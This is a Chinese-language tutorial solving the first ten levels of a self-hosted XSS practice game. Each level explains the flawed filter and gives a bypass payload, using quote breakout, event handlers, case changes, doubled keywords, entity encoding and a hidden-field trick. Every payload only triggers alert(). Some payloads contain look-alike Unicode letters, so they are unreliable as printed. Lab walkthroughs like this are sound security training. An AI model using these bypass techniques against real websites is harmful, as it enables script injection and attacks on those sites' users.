前言
xss是渗透测试当中常见的一种漏洞类型,在平时的测试过程我们也会遇到不少的xss脆弱性测试点,挖掘不少的xss漏洞,但是有时候同样的测试点,你挖不到,别人却可以挖到,那么是为什么呢?基本上是由以下两个原因导致:
- 自我对xss理解不够全面或深入
- 自我的xss技巧不深
本系列文章将会通过以下XSS游戏小平台来和大家一起“XSS”!
注:为了方便查看源代码,以及对xss利用的说明解析,笔者使用的环境是在本地自我搭建的,读者可以从以下链接当中下载源代码程序,之后在本地使用phpstudy搭建一个环境进行测试与学习!
平台源代码下载地址:https://download.csdn.net/download/fly_hps/10845260
备注:题目需要在Firefox当中做
闯关
level 1
特点:没有任何过滤防护机制,直接将以GET方式获取到的参数数值输出。
level 1.php
具体的分析如上,下面对输出点进行测试:
输出点 1:
payload:http://localhost/xss/level1.php?name=%3Csvg/οnlοad=alert(/1/);%3E
输出点 2:
无法控制输出点的结果值,所以无法xss
level 2
特点:需要闭合双引号("),之后自己构造自己的xss事件(简单的弹窗事、on事件等)
level 2.php
具体分析如上,下面对输入点进行xss测试:
输出点1:
payload1:1"><svg/οnlοad=alert(/1/);>
payload2: "οnmοuseοver=alert(/1/)>
当鼠标移动到输入框上面时发生XSS事件:
level 3
特点:使用了htmlspecialchars进行实体编码,但是忽略了单引号
level 3.php
分析如上,下面进行xss攻击测试:
payload:' οnmοuseοver='alert(1)
查看一波提交payload的源代码,发现成功插入XSS攻击事件
之后移动鼠标到输入框即可触发xss攻击
Level 4
特点:过滤了“<”和“>”,并且进行实体编码,但是未过滤双引号
level 4.php
分析如上,下面进行XSS攻击测试:
payload:" οnmοuseοver="alert(1)
添加以上payload之后,再查看源码之后发现成插入xss事件
当鼠标移动到输入框处,发现成功XSS
level5
特点:过滤关键字不全
level 5.php
分析如上,下面进行XSS攻击测试:
payload:"><a href="javascript:οnclick=alert(1)">test</a>
成功插入XSSpayload
之后点击超链接即可触发
level 6:
特点:虽然对部分关键词进行了防护过滤,但是没有先进行转换为小写,之后再去检测替换,导致可以使用大小写可绕过
level6.php
分析如上,下面进行XSS攻击测试:
payload:1"><svg/oNload=alert(/1/);>
注:这里同时也发现未先转换小写之后进行检测替换,所以可以使用大小写来绕过
level 7
特点:先转换为小写,之后再去过滤关键词,但是可以使用双写关键词绕过
level 7.php
分析如上,下面进行xss攻击测试:
payload:1"><svg/oonnload=alert(/1/);>
Level 8
特点:先转小写,之后对关键字进行过滤,但是可以通过编码进行绕过
level8.php
分析如上,下面进行XSS攻击测试:
payload:
javascript:alert() #HTML实体编码(HEX)
javascript:alert() #HTML实体编码(DEC)
Level9
特点:先转小写,之后过滤关键词,同时要判断友情链接是否有协议,通过实体编码绕过+注释包裹要求可以实现XSS攻击
Level 9.php
既然增加的判断,那么我们只需要在我们的payload当中添加一个http即可,同时使用注释包裹起来,让他不生效就好:
payload:javascript:alert(1)/*http://www.baidu.com*/
Level 10
特点:实体编码、过滤尖括号、隐藏参数属性、奇思妙想
Level10.php
此处的参数keyword获取之后直接以实体编码形式输出,所以无法实现XSS攻击,那么关键点就在于参数t_sort了,这里对参数t_sort过滤了<、>号,同时发现在上面的代码中下面有三个隐藏的参数设置,在这里把t_sort的 hidden更改一下成text ,之后构造以下payload:
http://localhost/xss/level10.php?keyword=1&t_sort=1%22%20type=%22text%22%20οnclick=%22alert(/1/);
未完,待续。。。。。